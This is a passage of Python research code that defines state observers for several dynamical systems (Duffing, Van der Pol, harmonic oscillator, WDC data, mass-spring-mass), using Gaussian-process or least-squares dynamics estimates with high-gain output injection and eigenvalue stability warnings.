                                                     reshape_pt1(u))
            if not kwargs.get('continuous_model'):
                # In this case we have continuous observer dynamics, but GP is
                # discrete # TODO better than Euler?
                mean = (mean - xhat) / GP.prior_kwargs.get('dt')
            # Record the gains used, for later logging/analysis.
            GP.prior_kwargs['observer_gains'] = {'l1': l1, 'l2': l2}
        else:
            mean = GP(reshape_pt1(xhat), reshape_pt1(u),
                      kwargs.get('prior_kwargs'))
    else:
        mean = np.zeros_like(u)
    LC = reshape_pt1([[l1 * (xhat[:, 0] - y), l2 * (xhat[:, 0] - y)]])
    xhatdot = reshape_pt1(mean + LC)
    return xhatdot
# Observer for the discrete time Duffing map
# Using current GP estimation of dynamics for xhat_t+1, + the Delgado gains (
# artificially well chosen for now since form chosen by knowing the
# dynamics...) * (xhat_t - y_t)
def duffing_observer_Delgado_GP_discrete(t, xhat, u, y, t0, init_control, GP,
                                         kwargs):
    """Discrete-time Duffing observer with GP-estimated dynamics.

    Next-state version of duffing_observer_Delgado_GP: GP prediction (or a
    callable prior, or zeros when GP is falsy) plus output injection LC with
    constant gains l1 = l2 = -0.8. Returns xhatnext.
    """
    xhat = reshape_pt1(xhat)
    # y and u are callables; evaluate them at the current time.
    y = reshape_pt1(y(t, kwargs))
    u = reshape_pt1(u(t, kwargs, t0, init_control))
    # My gains
    l1 = -0.8
    l2 = -0.8
    # # Delgado gains
    # l1 = - 5
    # l2 = - (alpha + 3 * xhat[:, 0] ** 2)
    if GP:
        if 'GP' in GP.__class__.__name__:
            mean, var, lowconf, uppconf = GP.predict(reshape_pt1(xhat),
                                                     reshape_pt1(u))
        else:
            mean = GP(reshape_pt1(xhat), reshape_pt1(u),
                      kwargs.get('prior_kwargs'))
    else:
        mean = np.zeros_like(u)
    LC = reshape_pt1([[l1 * (xhat[:, 0] - y), l2 * (xhat[:, 0] - y)]])
    xhatnext = reshape_pt1(mean + LC)
    return xhatnext
# High gain extended observer for the continuous time Duffing equation
# Using current GP estimation of dynamics for xi_dot, high gain observer
# from Michelangelo's paper, extended with extra state variable xi
def duffing_observer_Michelangelo_GP(t, xhat, u, y, t0, init_control, GP,
                                     kwargs):
    """High-gain extended observer (Michelangelo's paper) for the continuous
    Duffing equation, with GP-estimated dynamics derivative.

    The incoming state `xhat` is extended: its last column is the extra
    variable xi estimating the nonlinearity. The GP provides the derivative
    of the dynamics estimate (predict_deriv), which is saturated via
    kwargs['saturation'] to guarantee contraction. Gains g, k1..k3 are read
    from kwargs['prior_kwargs']['observer_gains']. Returns the concatenated
    (xhatdot, xidot); also warns (via logging) when the closed-loop matrix M
    has near-zero or positive real-part eigenvalues.
    """
    x = reshape_pt1(xhat)
    assert np.any(kwargs.get('saturation')), 'Need to define a saturation ' \
                                             'value to use the combined ' \
                                             'observer-identifier framework.'
    # Split the extended state: physical estimate vs. nonlinearity state xi.
    xhat = reshape_pt1(x[:, :-1])
    xi = reshape_pt1(x[:, -1])
    y = reshape_pt1(y(t, kwargs))
    u = reshape_pt1(u(t, kwargs, t0, init_control))
    # Gain (needs to be large enough)
    g = kwargs.get('prior_kwargs').get('observer_gains').get('g')
    k1 = kwargs.get('prior_kwargs').get('observer_gains').get('k1')
    k2 = kwargs.get('prior_kwargs').get('observer_gains').get('k2')
    k3 = kwargs.get('prior_kwargs').get('observer_gains').get('k3')
    Gamma1 = reshape_pt1([k1 * g, k2 * g ** 2])
    Gamma2 = reshape_pt1([k3 * g ** 3])
    if GP:
        if 'GP' in GP.__class__.__name__:
            mean_deriv, var_deriv, lowconf_deriv, uppconf_deriv = \
                GP.predict_deriv(reshape_pt1(xhat), reshape_pt1(u), only_x=True)
            # Record the gains used, for later logging/analysis.
            GP.prior_kwargs['observer_gains'].update({'g': g, 'Gamma1': Gamma1,
                                                      'Gamma2': Gamma2,
                                                      'k1': k1, 'k2': k2,
                                                      'k3': k3})
        else:
            mean_deriv = GP(reshape_pt1(xhat), reshape_pt1(u),
                            kwargs.get('prior_kwargs'))
    else:
        mean_deriv = np.zeros_like(xhat)
    if np.any(kwargs.get('saturation')):
        # Saturate the derivative of the nonlinearity estimate to guarantee
        # contraction
        a_min = np.min([-kwargs.get('saturation'), kwargs.get('saturation')],
                       axis=0)
        a_max = np.max([-kwargs.get('saturation'), kwargs.get('saturation')],
                       axis=0)
        mean_deriv = np.clip(mean_deriv, a_min=a_min, a_max=a_max)
    # Chain-of-integrators structure plus xi feeding the last channel.
    A = reshape_pt1([[0, 1], [0, 0]])
    B = reshape_pt1([[0], [1]])
    ABmult = np.dot(A, reshape_pt1_tonormal(xhat)) + \
             np.dot(B, reshape_pt1_tonormal(xi))
    DfA = reshape_pt1(np.dot(reshape_pt1_tonormal(mean_deriv),
                             reshape_pt1_tonormal(ABmult + u)))
    LC1 = reshape_pt1(Gamma1 * (y - xhat[:, 0]))
    LC2 = reshape_pt1(Gamma2 * (y - xhat[:, 0]))
    xhatdot = reshape_pt1(ABmult + LC1 + u)
    xidot = reshape_pt1(DfA + LC2)
    # Also check eigenvalues of M for stability without high gain
    AB = np.concatenate((A, B), axis=1)
    ABO = np.concatenate((AB, np.zeros_like(reshape_pt1(AB[0]))), axis=0)
    K = np.array([[k1, k2, k3]])
    C = np.zeros_like(x)
    C[0, 0] = 1
    M = ABO - np.dot(K.T, C)
    eigvals = np.linalg.eigvals(M)
    for x in eigvals:
        if np.linalg.norm(np.real(x)) < 1e-5:
            logging.warning('The eigenvalues of the matrix M are dangerously '
                            'small, low robustness of the observer! Increase '
                            'the gains.')
        elif np.real(x) > 0:
            logging.warning('Some of the eigenvalues of the matrix M are '
                            'positive. Change the gains to get a Hurwitz '
                            'matrix.')
    return np.concatenate((xhatdot, xidot), axis=1)
# High gain extended observer for the continuous time Duffing equation
# Using current LS estimationfor xi_dot, high gain observer
# from Michelangelo's paper, extended with extra state variable xi
def duffing_observer_Michelangelo_LS(t, xhat, u, y, t0, init_control, LS_deriv,
                                     kwargs):
    """High-gain extended observer for the continuous Duffing equation, with
    a least-squares (LS) estimate of the dynamics derivative.

    Same structure as duffing_observer_Michelangelo_GP, but `LS_deriv` is a
    plain callable (xhat, u, prior_kwargs) -> derivative estimate instead of
    a GP object; zeros are used when it is falsy. Returns the concatenated
    (xhatdot, xidot) and warns about non-Hurwitz closed-loop eigenvalues.
    """
    x = reshape_pt1(xhat)
    assert np.any(kwargs.get('saturation')), 'Need to define a saturation ' \
                                             'value to use the combined ' \
                                             'observer-identifier framework.'
    # Split the extended state: physical estimate vs. nonlinearity state xi.
    xhat = reshape_pt1(x[:, :-1])
    xi = reshape_pt1(x[:, -1])
    y = reshape_pt1(y(t, kwargs))
    u = reshape_pt1(u(t, kwargs, t0, init_control))
    # Gain (needs to be large enough)
    g = kwargs.get('prior_kwargs').get('observer_gains').get('g')
    k1 = kwargs.get('prior_kwargs').get('observer_gains').get('k1')
    k2 = kwargs.get('prior_kwargs').get('observer_gains').get('k2')
    k3 = kwargs.get('prior_kwargs').get('observer_gains').get('k3')
    Gamma1 = reshape_pt1([k1 * g, k2 * g ** 2])
    Gamma2 = reshape_pt1([k3 * g ** 3])
    if LS_deriv:
        mean_deriv = LS_deriv(reshape_pt1(xhat), reshape_pt1(u),
                              kwargs.get('prior_kwargs'))
    else:
        mean_deriv = np.zeros_like(xhat)
    if np.any(kwargs.get('saturation')):
        # Saturate the derivative of the nonlinearity estimate to guarantee
        # contraction
        a_min = np.min([-kwargs.get('saturation'), kwargs.get('saturation')],
                       axis=0)
        a_max = np.max([-kwargs.get('saturation'), kwargs.get('saturation')],
                       axis=0)
        mean_deriv = np.clip(mean_deriv, a_min=a_min, a_max=a_max)
    A = reshape_pt1([[0, 1], [0, 0]])
    B = reshape_pt1([[0], [1]])
    ABmult = np.dot(A, reshape_pt1_tonormal(xhat)) + \
             np.dot(B, reshape_pt1_tonormal(xi))
    DfA = reshape_pt1(np.dot(reshape_pt1_tonormal(mean_deriv),
                             reshape_pt1_tonormal(ABmult + u)))
    LC1 = reshape_pt1(Gamma1 * (y - xhat[:, 0]))
    LC2 = reshape_pt1(Gamma2 * (y - xhat[:, 0]))
    xhatdot = reshape_pt1(ABmult + LC1 + u)
    xidot = reshape_pt1(DfA + LC2)
    # Also check eigenvalues of M for stability without high gain
    AB = np.concatenate((A, B), axis=1)
    ABO = np.concatenate((AB, np.zeros_like(reshape_pt1(AB[0]))), axis=0)
    K = np.array([[k1, k2, k3]])
    C = np.zeros_like(x)
    C[0, 0] = 1
    M = ABO - np.dot(K.T, C)
    eigvals = np.linalg.eigvals(M)
    for x in eigvals:
        if np.linalg.norm(np.real(x)) < 1e-5:
            logging.warning('The eigenvalues of the matrix M are dangerously '
                            'small, low robustness of the observer! Increase '
                            'the gains.')
        elif np.real(x) > 0:
            logging.warning('Some of the eigenvalues of the matrix M are '
                            'positive. Change the gains to get a Hurwitz '
                            'matrix.')
    return np.concatenate((xhatdot, xidot), axis=1)
# Observer for the continuous time Van der Pol equation
# Source: Inspired by Observer design for the duffing equation using
# Gersgorin’s theorem, by Alberto Delgado, using the approximation x**2v -
# xhat**2vhat approximately 2xhatvhat (x-xhat)
def VanderPol_observer_simplified(t, xhat, u, y, t0, init_control, GP, kwargs):
    """Continuous-time observer for the Van der Pol equation.

    Inspired by Delgado's Duffing observer, using the approximation
    x**2 v - xhat**2 vhat ~= 2 xhat vhat (x - xhat). Parameter mu comes
    from kwargs; `GP` is unused (uniform signature). Returns xhatdot.
    """
    mu = kwargs.get('mu')
    xhat = reshape_pt1(xhat)
    # y and u are callables; evaluate them at the current time.
    y = reshape_pt1(y(t, kwargs))
    u = reshape_pt1(u(t, kwargs, t0, init_control))
    # My gains
    l1 = mu - 5
    # l2 = 1 - mu ** 2 - 2 * mu * xhat[:, 0] * xhat[:, 1]
    l2 = 1 - mu ** 2 - 2 * mu * xhat[:, 0]
    # Linear part A, Van der Pol nonlinearity F, output injection LC.
    A = reshape_pt1([[0, 1], [-1, 0]])
    F = reshape_pt1([0, mu * (1 - xhat[:, 0] ** 2) * xhat[:, 1]])
    LC = reshape_pt1([[l1 * (xhat[:, 0] - y), l2 * (xhat[:, 0] - y)]])
    xhatdot = reshape_pt1(np.dot(A, reshape_pt1_tonormal(xhat)) + F + LC + u)
    return xhatdot
# Linear Luenberger observer for harmonic oscillator, with control law u(t),
# continuous time
def harmonic_oscillator_observer_GP(t, xhat, u, y, t0, init_control, GP,
                                    kwargs):
    """Linear Luenberger observer for the harmonic oscillator, continuous
    time, with GP-estimated dynamics.

    Physical parameters k, m are read from kwargs; the GP (object with
    .predict, or a plain callable prior, or falsy for zeros) supplies the
    dynamics estimate, and output injection LC with fixed gains corrects it.
    Returns xhatdot.
    """
    k = kwargs.get('k')
    m = kwargs.get('m')
    xhat = reshape_pt1(xhat)
    # y and u are callables; evaluate them at the current time.
    y = reshape_pt1(y(t, kwargs))
    u = reshape_pt1(u(t, kwargs, t0, init_control))
    # Gains
    l1 = - 1
    l2 = k / m - 1
    if GP:
        if 'GP' in GP.__class__.__name__:
            mean, var, lowconf, uppconf = GP.predict(reshape_pt1(xhat),
                                                     reshape_pt1(u))
            if not kwargs.get('continuous_model'):
                # In this case we have continuous observer dynamics, but GP is
                # discrete # TODO better than Euler?
                mean = (mean - xhat) / GP.prior_kwargs.get('dt')
            # Record the gains used, for later logging/analysis.
            GP.prior_kwargs['observer_gains'] = {'l1': l1, 'l2': l2}
        else:
            mean = GP(reshape_pt1(xhat), reshape_pt1(u),
                      kwargs.get('prior_kwargs'))
    else:
        mean = np.zeros_like(u)
    LC = reshape_pt1([[l1 * (xhat[:, 0] - y), l2 * (xhat[:, 0] - y)]])
    xhatdot = reshape_pt1(mean + LC)
    return xhatdot
# High gain extended observer from Michelangelo for the WDC data
# Using current GP estimation of dynamics for xi_dot, high gain observer
# from Michelangelo's paper, extended with extra state variable xi
def WDC_observer_Michelangelo_GP(t, xhat, u, y, t0, init_control, GP, kwargs):
    """High-gain extended observer (Michelangelo's paper) for the WDC data,
    with GP-estimated dynamics derivative.

    Structurally identical to duffing_observer_Michelangelo_GP: the extended
    state carries xi in its last column, the GP's predict_deriv (saturated
    via kwargs['saturation']) drives xi, gains g, k1..k3 come from
    kwargs['prior_kwargs']['observer_gains']. Returns (xhatdot, xidot)
    concatenated, and warns when the closed-loop matrix M is not safely
    Hurwitz.
    """
    x = reshape_pt1(xhat)
    assert np.any(kwargs.get('saturation')), 'Need to define a saturation ' \
                                             'value to use the combined ' \
                                             'observer-identifier framework.'
    # Split the extended state: physical estimate vs. nonlinearity state xi.
    xhat = reshape_pt1(x[:, :-1])
    xi = reshape_pt1(x[:, -1])
    y = reshape_pt1(y(t, kwargs))
    u = reshape_pt1(u(t, kwargs, t0, init_control))
    # Gain (needs to be large enough)
    g = kwargs.get('prior_kwargs').get('observer_gains').get('g')
    k1 = kwargs.get('prior_kwargs').get('observer_gains').get('k1')
    k2 = kwargs.get('prior_kwargs').get('observer_gains').get('k2')
    k3 = kwargs.get('prior_kwargs').get('observer_gains').get('k3')
    Gamma1 = reshape_pt1([k1 * g, k2 * g ** 2])
    Gamma2 = reshape_pt1([k3 * g ** 3])
    if GP:
        if 'GP' in GP.__class__.__name__:
            mean_deriv, var_deriv, lowconf_deriv, uppconf_deriv = \
                GP.predict_deriv(reshape_pt1(xhat), reshape_pt1(u), only_x=True)
            # Record the gains used, for later logging/analysis.
            GP.prior_kwargs['observer_gains'].update({'g': g, 'Gamma1': Gamma1,
                                                      'Gamma2': Gamma2,
                                                      'k1': k1, 'k2': k2,
                                                      'k3': k3})
        else:
            mean_deriv = GP(reshape_pt1(xhat), reshape_pt1(u),
                            kwargs.get('prior_kwargs'))
    else:
        mean_deriv = np.zeros_like(xhat)
    if np.any(kwargs.get('saturation')):
        # Saturate the derivative of the nonlinearity estimate to guarantee
        # contraction
        a_min = np.min([-kwargs.get('saturation'), kwargs.get('saturation')],
                       axis=0)
        a_max = np.max([-kwargs.get('saturation'), kwargs.get('saturation')],
                       axis=0)
        mean_deriv = np.clip(mean_deriv, a_min=a_min, a_max=a_max)
    A = reshape_pt1([[0, 1], [0, 0]])
    B = reshape_pt1([[0], [1]])
    ABmult = np.dot(A, reshape_pt1_tonormal(xhat)) + \
             np.dot(B, reshape_pt1_tonormal(xi))
    DfA = reshape_pt1(np.dot(reshape_pt1_tonormal(mean_deriv),
                             reshape_pt1_tonormal(ABmult + u)))
    LC1 = reshape_pt1(Gamma1 * (y - xhat[:, 0]))
    LC2 = reshape_pt1(Gamma2 * (y - xhat[:, 0]))
    xhatdot = reshape_pt1(ABmult + LC1 + u)
    xidot = reshape_pt1(DfA + LC2)
    # Also check eigenvalues of M for stability without high gain
    AB = np.concatenate((A, B), axis=1)
    ABO = np.concatenate((AB, np.zeros_like(reshape_pt1(AB[0]))), axis=0)
    K = np.array([[k1, k2, k3]])
    C = np.zeros_like(x)
    C[0, 0] = 1
    M = ABO - np.dot(K.T, C)
    eigvals = np.linalg.eigvals(M)
    for x in eigvals:
        if np.linalg.norm(np.real(x)) < 1e-5:
            logging.warning('The eigenvalues of the matrix M are dangerously '
                            'small, low robustness of the observer! Increase '
                            'the gains.')
        elif np.real(x) > 0:
            logging.warning('Some of the eigenvalues of the matrix M are '
                            'positive. Change the gains to get a Hurwitz '
                            'matrix.')
    return np.concatenate((xhatdot, xidot), axis=1)
# High gain observer (simple, not extended like Michelangelo) for the WDC data
# Using current GP estimation of dynamics for xdot, regular high gain observer
def WDC_observer_highgain_GP(t, xhat, u, y, t0, init_control, GP, kwargs):
    """Plain (non-extended) high-gain observer for the WDC data.

    The GP (object with .predict, callable prior, or falsy for zeros)
    estimates the full dynamics xdot; the estimate is saturated via
    kwargs['saturation'] and corrected by the single output-injection term
    Gamma1 built from gains g, k1, k2 in
    kwargs['prior_kwargs']['observer_gains']. Returns xhatdot.
    """
    x = reshape_pt1(xhat)
    assert np.any(kwargs.get('saturation')), 'Need to define a saturation ' \
                                             'value to use the combined ' \
                                             'observer-identifier framework.'
    xhat = reshape_pt1(x)
    # y and u are callables; evaluate them at the current time.
    y = reshape_pt1(y(t, kwargs))
    u = reshape_pt1(u(t, kwargs, t0, init_control))
    # Gain (needs to be large enough)
    g = kwargs.get('prior_kwargs').get('observer_gains').get('g')
    k1 = kwargs.get('prior_kwargs').get('observer_gains').get('k1')
    k2 = kwargs.get('prior_kwargs').get('observer_gains').get('k2')
    Gamma1 = reshape_pt1([k1 * g, k2 * g ** 2])
    if GP:
        if 'GP' in GP.__class__.__name__:
            mean, var, lowconf, uppconf = GP.predict(reshape_pt1(xhat),
                                                     reshape_pt1(u))
            if not kwargs.get('continuous_model'):
                # discrete model so need to differentiate it in continuous obs
                mean = (mean - xhat) / GP.prior_kwargs.get(
                    'dt')  # TODO better than Euler?
            # Record the gains used, for later logging/analysis.
            GP.prior_kwargs['observer_gains'].update({'g': g, 'Gamma1': Gamma1,
                                                      'k1': k1, 'k2': k2})
        else:
            mean = GP(reshape_pt1(xhat), reshape_pt1(u), kwargs.get(
                'prior_kwargs'))
    else:
        mean = np.zeros_like(xhat)
    if np.any(kwargs.get('saturation')):
        # Saturate the derivative of the nonlinearity estimate to guarantee
        # contraction
        a_min = np.min([-kwargs.get('saturation'), kwargs.get('saturation')],
                       axis=0)
        a_max = np.max([-kwargs.get('saturation'), kwargs.get('saturation')],
                       axis=0)
        mean = np.clip(mean, a_min=a_min, a_max=a_max)
    LC1 = reshape_pt1(Gamma1 * (y - xhat[:, 0]))
    xhatdot = reshape_pt1(mean + LC1 + u)
    return reshape_pt1(xhatdot)
# High gain observer (simple, not extended like Michelangelo) for the WDC data
# Using current GP estimation of velocity for xdot, regular high gain
# observer but with GP only predicting velocity
def WDC_justvelocity_observer_highgain_GP(t, xhat, u, y, t0, init_control,
                                          GP, kwargs):
    """High-gain observer for the WDC data where the GP predicts only the
    velocity channel.

    The GP estimate `mean` (saturated via kwargs['saturation']) replaces
    only the second state derivative through the B channel of the
    chain-of-integrators model; position follows A. Gains g, k1, k2 come
    from kwargs['prior_kwargs']['observer_gains']. Returns xhatdot and warns
    when the closed-loop matrix M is not safely Hurwitz.
    """
    x = reshape_pt1(xhat)
    assert np.any(kwargs.get('saturation')), 'Need to define a saturation ' \
                                             'value to use the combined ' \
                                             'observer-identifier framework.'
    xhat = reshape_pt1(x)
    # y and u are callables; evaluate them at the current time.
    y = reshape_pt1(y(t, kwargs))
    u = reshape_pt1(u(t, kwargs, t0, init_control))
    # Gain (needs to be large enough)
    g = kwargs.get('prior_kwargs').get('observer_gains').get('g')
    k1 = kwargs.get('prior_kwargs').get('observer_gains').get('k1')
    k2 = kwargs.get('prior_kwargs').get('observer_gains').get('k2')
    Gamma1 = reshape_pt1([k1 * g, k2 * g ** 2])
    if GP:
        if 'GP' in GP.__class__.__name__:
            mean, var, lowconf, uppconf = GP.predict(reshape_pt1(xhat),
                                                     reshape_pt1(u))
            if not kwargs.get('continuous_model'):
                # discrete model so need to differentiate it in continuous obs
                mean = (mean - reshape_pt1(xhat[:, 1])) / GP.prior_kwargs.get(
                    'dt')  # TODO better than Euler?
            # Record the gains used, for later logging/analysis.
            GP.prior_kwargs['observer_gains'].update({'g': g, 'Gamma1': Gamma1,
                                                      'k1': k1, 'k2': k2})
        else:
            mean = GP(reshape_pt1(xhat), reshape_pt1(u), kwargs.get(
                'prior_kwargs'))
    else:
        mean = np.zeros_like(reshape_pt1(xhat[:, 1]))
    if np.any(kwargs.get('saturation')):
        # Saturate the estimate of the nonlinearity to guarantee contraction
        a_min = np.min([-kwargs.get('saturation'), kwargs.get('saturation')],
                       axis=0)
        a_max = np.max([-kwargs.get('saturation'), kwargs.get('saturation')],
                       axis=0)
        mean = np.clip(mean, a_min=a_min, a_max=a_max)
    A = reshape_pt1([[0, 1], [0, 0]])
    B = reshape_pt1([[0], [1]])
    ABmult = np.dot(A, reshape_pt1_tonormal(xhat)) + \
             np.dot(B, reshape_pt1_tonormal(mean))
    LC1 = reshape_pt1(Gamma1 * (y - xhat[:, 0]))
    xhatdot = reshape_pt1(ABmult + LC1 + u)
    # Also check eigenvalues of M for stability without high gain
    K = np.array([[k1, k2]])
    C = np.zeros_like(xhat)
    C[0, 0] = 1
    M = A - np.dot(K.T, C)
    eigvals = np.linalg.eigvals(M)
    for x in eigvals:
        if np.linalg.norm(np.real(x)) < 1e-5:
            logging.warning('The eigenvalues of the matrix M are dangerously '
                            'small, low robustness of the observer! Increase '
                            'the gains.')
        elif np.real(x) > 0:
            logging.warning('Some of the eigenvalues of the matrix M are '
                            'positive. Change the gains to get a Hurwitz '
                            'matrix.')
    return reshape_pt1(xhatdot)
# High gain observer (simple, not extended like Michelangelo) for the WDC data
# Using current LS estimation of velocity for xdot, regular high gain
# observer but with GP only predicting velocity
def WDC_justvelocity_observer_highgain_LS(t, xhat, u, y, t0, init_control,
                                          LS, kwargs):
    """High gain observer for the WDC data where a least-squares (LS) model
    predicts only the velocity dynamics.

    Computes the continuous-time derivative of the observer state: a chain of
    integrators driven by the LS velocity estimate, corrected by a high-gain
    output-injection term Gamma1 * (y - yhat) plus the control u.

    :param t: current time
    :param xhat: current observer state estimate
    :param u: control callable, evaluated as u(t, kwargs, t0, init_control)
    :param y: measurement callable, evaluated as y(t, kwargs)
    :param t0: initial time
    :param init_control: initial control value passed through to u
    :param LS: least-squares model callable (xhat, u, prior_kwargs) -> mean,
        or falsy to assume zero velocity dynamics
    :param kwargs: options dict; must define a nonzero 'saturation' and the
        observer gains in kwargs['prior_kwargs']['observer_gains']
    :return: xhatdot, the time derivative of the observer state
    """
    x = reshape_pt1(xhat)
    assert np.any(kwargs.get('saturation')), 'Need to define a saturation ' \
                                             'value to use the combined ' \
                                             'observer-identifier framework.'
    xhat = reshape_pt1(x)
    y = reshape_pt1(y(t, kwargs))
    u = reshape_pt1(u(t, kwargs, t0, init_control))
    # Gain (needs to be large enough)
    g = kwargs.get('prior_kwargs').get('observer_gains').get('g')
    k1 = kwargs.get('prior_kwargs').get('observer_gains').get('k1')
    k2 = kwargs.get('prior_kwargs').get('observer_gains').get('k2')
    # High-gain design: correction gains scale with powers of g
    Gamma1 = reshape_pt1([k1 * g, k2 * g ** 2])
    if LS:
        mean = LS(reshape_pt1(xhat), reshape_pt1(u), kwargs.get('prior_kwargs'))
        if not kwargs.get('continuous_model'):
            # discrete model so need to differentiate it in continuous obs
            mean = (mean - reshape_pt1(xhat[:, 1])) / kwargs.get('dt')
            # TODO better than Euler?
    else:
        # No model available: assume zero velocity dynamics
        mean = np.zeros_like(reshape_pt1(xhat[:, 1]))
    if np.any(kwargs.get('saturation')):
        # Saturate the estimate of the nonlinearity to guarantee contraction
        a_min = np.min([-kwargs.get('saturation'), kwargs.get('saturation')],
                       axis=0)
        a_max = np.max([-kwargs.get('saturation'), kwargs.get('saturation')],
                       axis=0)
        mean = np.clip(mean, a_min=a_min, a_max=a_max)
    # Observer dynamics: integrator chain A, model output injected through B
    A = reshape_pt1([[0, 1], [0, 0]])
    B = reshape_pt1([[0], [1]])
    ABmult = np.dot(A, reshape_pt1_tonormal(xhat)) + \
             np.dot(B, reshape_pt1_tonormal(mean))
    LC1 = reshape_pt1(Gamma1 * (y - xhat[:, 0]))
    xhatdot = reshape_pt1(ABmult + LC1 + u)
    # Also check eigenvalues of M for stability without high gain
    K = np.array([[k1, k2]])
    C = np.zeros_like(xhat)
    C[0, 0] = 1
    M = A - np.dot(K.T, C)
    eigvals = np.linalg.eigvals(M)
    for eig in eigvals:
        if np.linalg.norm(np.real(eig)) < 1e-5:
            logging.warning('The eigenvalues of the matrix M are dangerously '
                            'small, low robustness of the observer! Increase '
                            'the gains.')
        elif np.real(eig) > 0:
            logging.warning('Some of the eigenvalues of the matrix M are '
                            'positive. Change the gains to get a Hurwitz '
                            'matrix.')
    return reshape_pt1(xhatdot)
# High gain observer (simple, not extended like Michelangelo) for the WDC data
# Using current GP estimation of velocity for xdot, regular high gain
# observer but with GP only predicting velocity, but returning xnext using
# Euler discretization instead of xdot
def WDC_justvelocity_discrete_observer_highgain_GP(t, xhat, u, y, t0,
                                                   init_control, GP, kwargs):
    """Discrete-time wrapper around the WDC high gain velocity observer.

    Evaluates the continuous-time observer derivative, then advances the
    state by one forward Euler step of length kwargs['dt_before_subsampling']
    and returns the next state instead of the derivative.
    """
    step = kwargs.get('dt_before_subsampling')
    derivative = WDC_justvelocity_observer_highgain_GP(
        t, xhat, u, y, t0, init_control, GP, kwargs)
    # TODO better than Euler?
    return reshape_pt1(xhat + step * derivative)
# High gain observer (simple, not extended like Michelangelo) for the WDC data
# Using current GP estimation of velocity for xdot, regular high gain
# observer but with GP only predicting velocity and with gain following a
# dynamical adaptation law
def WDC_justvelocity_observer_adaptive_highgain_GP(t, xhat, u, y, t0,
                                                   init_control, GP, kwargs):
    """High gain observer for the WDC data with a dynamically adapted gain.

    Same structure as the fixed-gain WDC velocity observer, except the gain g
    is carried as the last component of the extended state and evolves
    following the adaptation law stored in
    kwargs['prior_kwargs']['observer_gains']['adaptation_law'].

    :return: time derivative of the extended state, [xhatdot, gdot]
    """
    x = reshape_pt1(xhat)
    assert np.any(kwargs.get('saturation')), 'Need to define a saturation ' \
                                             'value to use the combined ' \
                                             'observer-identifier framework.'
    # Split extended state: observer state and current adaptive gain g
    xhat = reshape_pt1(x[:, :-1])
    g = float(x[:, -1])
    y = reshape_pt1(y(t, kwargs))
    u = reshape_pt1(u(t, kwargs, t0, init_control))
    adaptation_law = \
        kwargs.get('prior_kwargs').get('observer_gains').get('adaptation_law')
    # Gain (needs to be large enough)
    k1 = kwargs.get('prior_kwargs').get('observer_gains').get('k1')
    k2 = kwargs.get('prior_kwargs').get('observer_gains').get('k2')
    # Correction gains scale with powers of the current adaptive gain g
    Gamma1 = reshape_pt1([k1 * g, k2 * g ** 2])
    if GP:
        if 'GP' in GP.__class__.__name__:
            # Trained GP object: use its predictive mean for the velocity
            mean, var, lowconf, uppconf = GP.predict(reshape_pt1(xhat),
                                                     reshape_pt1(u))
            if not kwargs.get('continuous_model'):
                # discrete model so need to differentiate it in continuous obs
                mean = (mean - reshape_pt1(xhat[:, 1])) / GP.prior_kwargs.get(
                    'dt')  # TODO better than Euler?
        else:
            # GP is a plain callable (e.g. a prior mean function)
            mean = GP(reshape_pt1(xhat), reshape_pt1(u), kwargs.get(
                'prior_kwargs'))
    else:
        # No model available: assume zero velocity dynamics
        mean = np.zeros_like(reshape_pt1(xhat[:, 1]))
    if np.any(kwargs.get('saturation')):
        # Saturate the estimate of the nonlinearity to guarantee contraction
        a_min = np.min([-kwargs.get('saturation'), kwargs.get('saturation')],
                       axis=0)
        a_max = np.max([-kwargs.get('saturation'), kwargs.get('saturation')],
                       axis=0)
        mean = np.clip(mean, a_min=a_min, a_max=a_max)
    # Observer dynamics: A xhat + B mean + Gamma1 * (y - yhat) + u
    A = reshape_pt1([[0, 1], [0, 0]])
    B = reshape_pt1([[0], [1]])
    ABmult = np.dot(A, reshape_pt1_tonormal(xhat)) + \
             np.dot(B, reshape_pt1_tonormal(mean))
    LC1 = reshape_pt1(Gamma1 * (y - xhat[:, 0]))
    xhatdot = reshape_pt1(ABmult + LC1 + u)
    # Evolve the gain g following the user-provided adaptation law
    gdot = reshape_pt1(adaptation_law(g=g, y=y, yhat=reshape_pt1(xhat[:, 0]),
                                      kwargs=kwargs.get('prior_kwargs').get(
                                          'observer_gains')))
    # Also check eigenvalues of M for stability without high gain
    K = np.array([[k1, k2]])
    C = np.zeros_like(xhat)
    C[0, 0] = 1
    M = A - np.dot(K.T, C)
    eigvals = np.linalg.eigvals(M)
    for x in eigvals:
        if np.linalg.norm(np.real(x)) < 1e-5:
            logging.warning('The eigenvalues of the matrix M are dangerously '
                            'small, low robustness of the observer! Increase '
                            'the gains.')
        elif np.real(x) > 0:
            logging.warning('Some of the eigenvalues of the matrix M are '
                            'positive. Change the gains to get a Hurwitz '
                            'matrix.')
    return reshape_pt1(np.concatenate((xhatdot, gdot), axis=1))
# High gain extended observer from Michelangelo for the mass-spring-mass system
# Using current GP estimation of dynamics for xi_dot, high gain observer
# from Michelangelo's paper, extended with extra state variable xi
def MSM_observer_Michelangelo_GP(t, xhat, u, y, t0, init_control, GP, kwargs):
    """High gain extended observer (Michelangelo-style) for the
    mass-spring-mass system.

    The observer state is extended with an extra variable xi estimating the
    nonlinearity; the GP supplies the derivative of the dynamics used to
    propagate xi.

    :return: time derivative of the extended state, [xhatdot, xidot]
    """
    x = reshape_pt1(xhat)
    assert np.any(kwargs.get('saturation')), 'Need to define a saturation ' \
                                             'value to use the combined ' \
                                             'observer-identifier framework.'
    # Split extended state into observer state xhat and extra variable xi
    xhat = reshape_pt1(x[:, :-1])
    xi = reshape_pt1(x[:, -1])
    y = reshape_pt1(y(t, kwargs))
    u = reshape_pt1(u(t, kwargs, t0, init_control))
    # Gain (needs to be large enough)
    g = kwargs.get('prior_kwargs').get('observer_gains').get('g')
    k1 = kwargs.get('prior_kwargs').get('observer_gains').get('k1')
    k2 = kwargs.get('prior_kwargs').get('observer_gains').get('k2')
    k3 = kwargs.get('prior_kwargs').get('observer_gains').get('k3')
    k4 = kwargs.get('prior_kwargs').get('observer_gains').get('k4')
    k5 = kwargs.get('prior_kwargs').get('observer_gains').get('k5')
    # High-gain design: correction gains scale with powers of g
    Gamma1 = reshape_pt1([k1 * g, k2 * g ** 2, k3 * g ** 3, k4 * g ** 4])
    Gamma2 = reshape_pt1([k5 * g ** 5])
    if GP:
        if 'GP' in GP.__class__.__name__:
            # Trained GP object: derivative of the predictive mean w.r.t. x
            mean_deriv, var_deriv, lowconf_deriv, uppconf_deriv = \
                GP.predict_deriv(reshape_pt1(xhat), reshape_pt1(u), only_x=True)
        else:
            # GP is a plain callable returning the derivative directly
